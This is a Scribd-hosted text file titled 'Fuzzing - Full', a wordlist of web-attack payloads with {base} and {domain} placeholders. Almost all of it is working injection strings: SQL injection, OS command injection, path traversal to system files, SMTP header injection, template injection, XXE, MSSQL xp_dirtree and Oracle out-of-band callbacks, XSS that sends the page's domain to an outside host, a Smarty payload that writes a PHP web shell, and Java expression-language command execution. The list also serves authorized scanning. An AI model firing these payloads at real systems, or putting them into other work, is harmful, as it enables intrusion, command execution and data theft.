Scribd
Upload
13 views4 pages

Fuzzing - Full

The document contains a series of code snippets and commands that appear to be related to security vulnerabilities, particularly SQL injection and command injection. It includes various payloads and examples for exploiting web applications and servers, using placeholders for domains and base paths. The content suggests a focus on testing and exploiting weaknesses in web application security.

Uploaded by

kenjie.f.a.var.des.o
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
13 views4 pages

Fuzzing - Full

The document contains a series of code snippets and commands that appear to be related to security vulnerabilities, particularly SQL injection and command injection. It includes various payloads and examples for exploiting web applications and servers, using placeholders for domains and base paths. The content suggests a focus on testing and exploiting weaknesses in web application security.

Uploaded by

kenjie.f.a.var.des.o
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 4

'

''
\
\\
{base}-0
{base}*1
{base}'||'
{base}'+'
{base}' '
"
""
{base}"||"
{base}/*_*/
'{base}'
"{base}"
({base})
`
{base}'--
{base}')--
{base}'))--
{base}'#
{base}')#
{base}'))#
{base}' and 'z'='z
{base}' or 'z'='z
{base}" or "z"="z
}}
${77*77}
{{77*77}}
xsstest'"><
/{base}
./{base}
../{base}
/./{base}
/../{base}
xxx/../{base}
{base}::$DATA
../../../../../../../../../../../../etc/hosts
..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../windows/win.ini
{base}))))))))))
{base}|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
{base}| ping -i 30 127.0.0.1 |
{base}| ping -n 30 127.0.0.1 |
{base}& ping -i 30 127.0.0.1 &
{base}& ping -n 30 127.0.0.1 &
{base}; ping -c 5 127.0.0.1 ;
{base}%0a ping -i 30 127.0.0.1 %0a
`ping -c 5 127.0.0.1`
{base}| id
{base}& id
{base}; id
`id`
;echo 111111
echo 111111
response.write 111111
:response.write 111111
http://{domain}/
foo@{domain}%0aCc:foo@{domain}
foo@{domain}%0d%0aCc:foo@{domain}
foo@{domain}%0aBcc:foo@{domain}
foo@{domain}%0d%0aBcc:foo@{domain}
{base}%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+foo@{domain}%0aRCPT+TO:+foo@{domain}%0aDATA
%0aFrom:+foo@{domain}%0aTo:+foo@{domain}%0aSubject:+tst%0afoo%0a%2e%0a
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+foo@{domain}%0d%0aRCPT+TO:
+foo@{domain}%0d%0aDATA%0d%0aFrom:+foo@{domain}%0d%0aTo:+foo@{domain}%0d%0aSubject:
+test%0d%0afoo%0d%0a%2e%0d%0a
{base}","x":"
{base}"],"x":["
{base},"x":1
{base}" a="
{base}" xmlns:xsi="
{base} a=""
{base}' a='
{base}' xmlns:xsi='
{base}<!--xx-->
<![CDATA[{base}]]>
<a>{base}</a>
xsstest
xsstest%00"<>'
{77*77}
{{{77*77}}}
${{77*77}}
#{77*77}
[[77*77]]
{{=77*77}}
[[${77*77}]]
<%=77*77%>
${xyz|77*77}
#set($x=77*77)${x}
@(77*77)
<p th:text='${#ctx.getClass()}'></p>
${#ctx.getClass()}
<#assign xy="zxxxxxxz"><#assign yx="zyyyyyyz">${yx}${xy}
nslookup {domain}&
`nslookup {domain}`
|nslookup {domain}&
'"`0&nslookup {domain}&`'
&nslookup -q=cname {domain}&'\"`0&nslookup {domain}&`'
+eval("require'socket'\nSocket.gethostbyname('{domain}')")+'
eval("require'socket'\nSocket.gethostbyname('{domain}')")
"+eval("require'socket'\nSocket.gethostbyname('{domain}')")+"
'+eval(compile('for x in range(1):\n import socket\n
socket.gethostbyname("{domain}")','a','single'))+'
eval(compile('for x in range(1):\n import socket\n
socket.gethostbyname("{domain}")','a','single'))
gethostbyname('{domain}')
'.gethostbyname('{domain}').'
'.gethostbyname("{domain}").'
{${gethostbyname("{domain}")}}
require('child_process').exec('nslookup {domain}')
'-require('child_process').exec('nslookup {domain}')-'
"-require("child_process").exec("nslookup {domain}")-"
<% require('child_process').exec('nslookup {domain}'); %>
<% require("child_process").exec("nslookup {domain}"); %>
||UTL_INADDR.get_host_address('{domain}')
'||UTL_INADDR.get_host_address('{domain}')||'
||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM
"http://{domain}/ext1">%xxx;]>'),'/l')
'||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM
"http://{domain}/ext2">%xxx;]>'),'/l')||'
UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain}))
extractvalue(xmltype(ORACLE_ENCODE_STRING(<!DOCTYPE root [<!ENTITY % xxx SYSTEM
"http://{domain}/ext3">%xxx;]>),ORACLE_ENCODE_STRING(/l))
or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(<!DOCTYPE root [<!ENTITY % xxx
SYSTEM "http://{domain}/ext4">%xxx;]>),ORACLE_ENCODE_STRING(/l))
(select load_file('\\\\{domain}\\c'))
'+(select load_file('\\\\{domain}\\e'))+'
;EXEC master..xp_dirtree '\\{domain}\s'--
1;EXEC master..xp_dirtree '\\{domain}\s'--
';EXEC master..xp_dirtree '\\{domain}\s'--
');EXEC master..xp_dirtree '\\{domain}\s'--
;EXEC master..xp_dirtree "\\{domain}\s"--
1;EXEC master..xp_dirtree "\\{domain}\s"--
";EXEC master..xp_dirtree "\\{domain}\s"--
");EXEC master..xp_dirtree "\\{domain}\s"--
"='';EXEC master..xp_dirtree "\\{domain}\s"--
"='');EXEC master..xp_dirtree "\\{domain}\s"--
;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
');DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
";DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
");DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
"='';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree
'\\{domain}\s');EXEC(@x)--
"='');DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree
'\\{domain}\s');EXEC(@x)--
\';DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
\";DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree '\\
{domain}\s');EXEC(@x)--
rmi://{domain}/go
ldap://{domain}/cn=bar,dc=test,dc=org
" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://{domain}/x.xsd
<a xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://{domain}/x.xsd"><b></b></a>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include
href="http://{domain}/xincl"></xi:include></data>
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE a SYSTEM
"http://{domain}/xxx"><a></a>
<?xml version="1.0" encoding="UTF-8" standalone="no"?><!DOCTYPE x [<!ENTITY % xx
SYSTEM "http://{domain}/xxx">%xx;]><a></a>
*/--></script></title></textarea></noscript></style></xmp></noembed></comment></
noframes></xml></iframe>"'><script>document.write('<img
src=//{domain}/'+document.domain+'>')</script>
*/--></script></title></textarea></noscript></style></xmp></noembed></comment></
noframes></xml></iframe>"'><img src="//{domain}/image.jpg">
"-->'-->`--><!--#set var="suc" value="rtb97y3o64"--><!--#set var="uwe"
value="tvdb905q86"--><!--#echo var="suc"--><!--#echo var="uwe"--><!--#exec
cmd="nslookup {domain}" -->
javascript:/*</script><img/onerror='-/"/-/
onmouseover=1/-/[`*/[]/[(new(Image)).src=(/;/+/rkf9yyuox44dahzjkookgz001r7ovej6au1k
oaczX;.{domain}/).replace(/.;/g,[])]//'src=>
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("nslookup {domain}")
}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['nslookup
{domain}']); ?>",self::clearConfig())}
{domain}
http://{domain}
https://{domain}
%20{!xmlparser v='<!DOCTYPE a SYSTEM "http://{domain}/sr"><a></a>'}%20
" {!xmlparser v='<!DOCTYPE a SYSTEM "http://{domain}/sr"><a></a>'} "
") {!xmlparser v='<!DOCTYPE a SYSTEM "http://{domain}/sr"><a></a>'} ("
&shards={domain}/sr
#{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngine
ByName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]
([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}
}#{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngin
eByName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]
([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}#{
#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngine
ByName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']
([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}
}#{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngin
eByName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']
([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}#{
$
{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineB
yName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]
([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}
}$
{"".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineB
yName("JavaScript").eval("new java.lang.ProcessBuilder[\"(java.lang.String[])\"]
([\"/bin/sh\",\"-c\",\"nslookup {domain}\"]).start()")}${
$
{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineB
yName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']
([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}
}$
{''.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineB
yName('JavaScript').eval('new java.lang.ProcessBuilder[\'(java.lang.String[])\']
([\'/bin/sh\',\'-c\',\'nslookup {domain}\']).start()')}${

You might also like